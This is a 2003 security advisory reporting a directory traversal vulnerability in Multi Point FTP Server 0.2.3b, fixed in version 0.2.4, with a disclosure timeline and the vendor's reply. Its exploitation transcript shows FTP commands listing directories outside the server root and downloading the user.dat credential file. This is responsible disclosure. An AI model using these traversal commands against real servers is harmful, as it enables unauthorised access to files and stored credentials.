Directory Traversal Vulnerability Found in Multi Point FTP Server 0.2.3b http://www.multipointftp.de/ Discovered by Dennis Rand ------------------------------------------------------------------------ -----[SUMMARY The problem is a directory traversal vulnerability that allows a person to get and list files anywhere on the server. -----[AFFECTED SYSTEMS Vulnerable systems: * Multi Point FTP Server 0.2.3b Immune systems: * Multi Point FTP Server 0.2.4 -----[SEVERITY Medium/High - An attacker is able to get any file on the server and if the "Write" permission is set also put files anywhere on the server. This could lead to full compromise of the server. -----[DESCRIPTION OF WHAT THE VULNERABILITY IS The Vulnerability is a directory traversal problem that allows an anonymous user to GET files and LIST files anywhere on the server. The following transcript demonstrates a sample exploitation of the Vulnerabilities: ----------------------------- [Transcript] ----------------------------- ftp> dir c:\Progra~1\ 200 Port command successful. 150 Opening data connection for directory list. dr--r--r-- 1 ftp ftp 0 Jul 16 15:21 . dr--r--r-- 1 ftp ftp 0 Jul 16 15:21 .. drw-rw-rw- 1 ftp ftp 0 May 26 10:10 Accessories drw-rw-rw- 1 ftp ftp 0 May 26 11:56 Common Files drw-rw-rw- 1 ftp ftp 0 May 26 10:12 ComPlus Applications drw-rw-rw- 1 ftp ftp 0 Jul 16 15:28 Debugging Tools for Windows drw-rw-rw- 1 ftp ftp 0 May 26 11:56 Internet Explorer drw-rw-rw- 1 ftp ftp 0 May 26 10:19 microsoft frontpage drw-rw-rw- 1 ftp ftp 0 Jul 16 15:21 Multipoint FTP Server drw-rw-rw- 1 ftp ftp 0 May 26 10:14 NetMeeting drw-rw-rw- 1 ftp ftp 0 May 26 12:17 Outlook Express drw-rw-rw- 1 ftp ftp 0 Jul 15 12:03 Windows Media Components drw-rw-rw- 1 ftp ftp 0 May 26 10:14 Windows Media Player drw-rw-rw- 1 ftp ftp 0 May 26 10:11 Windows NT 226 File sent ok ftp: 1070 bytes received in 0,07Seconds 15,29Kbytes/sec. ftp> dir c:\Progra~1\Multip~1\ 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Jul 16 15:21 . drw-rw-rw- 1 ftp ftp 0 Jul 16 15:21 .. -rwxrwxrwx 1 ftp ftp 502784 May 16 11:15 ftpServer.exe -rw-rw-rw- 1 ftp ftp 50704 May 15 12:46 ftpServer.mld -rw-rw-rw- 1 ftp ftp 1060 Jul 16 15:28 Server.DAT -rw-rw-rw- 1 ftp ftp 1823 Jul 16 15:21 unins000.dat -rwxrwxrwx 1 ftp ftp 71588 Apr 14 03:00 unins000.exe -rw-rw-rw- 1 ftp ftp 1340 Jul 16 15:52 User.DAT -rw-rw-rw- 1 ftp ftp 2110 May 16 10:39 Version History.txt 226 File sent ok ftp: 603 bytes received in 0,04Seconds 15,07Kbytes/sec. ftp> get c:\Progra~1\Multip~1\user.dat 200 Port command successful. 150 Opening data connection for c:\Progra~1\Multip~1\user.dat. 226 File sent ok ftp: 1340 bytes received in 0,00Seconds 1340000,00Kbytes/sec. ----------------------------- [Transcript] ----------------------------- -----[DETECTION Multi Point FTP Server 0.2.3b is vulnerable to the above-described attacks. Earlier versions may be susceptible as well. To determine if a specific implementation is vulnerable, experiment by following the above transcript. -----[WORK AROUNDS Update with Multi Point FTP Server Version 0.2.4 from vendor can be located at following URL http://multipointftp.de/download/MultipointFTPServer.exe -----[VENDOR RESPONSE Hallo Mr Rand, thanks for this security Bug, I will fix it in the new Version. I will be come out around the 15. August. -----[DISCLOSURE TIMELINE 21/07/2003 Found the Vulnerability, and made an analysis. 23/07/2003 Reported to Vendor. 01/08/2003 Send another mail to vendor about this problem. 03/08/2003 Received response from vendor. 12/08/2003 Version 0.2.4 is out. 20/08/2003 Public Disclosure. -----[ADDITIONAL INFORMATION The vulnerability was discovered and reported by Dennis Rand -----[DISCLAIMER The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.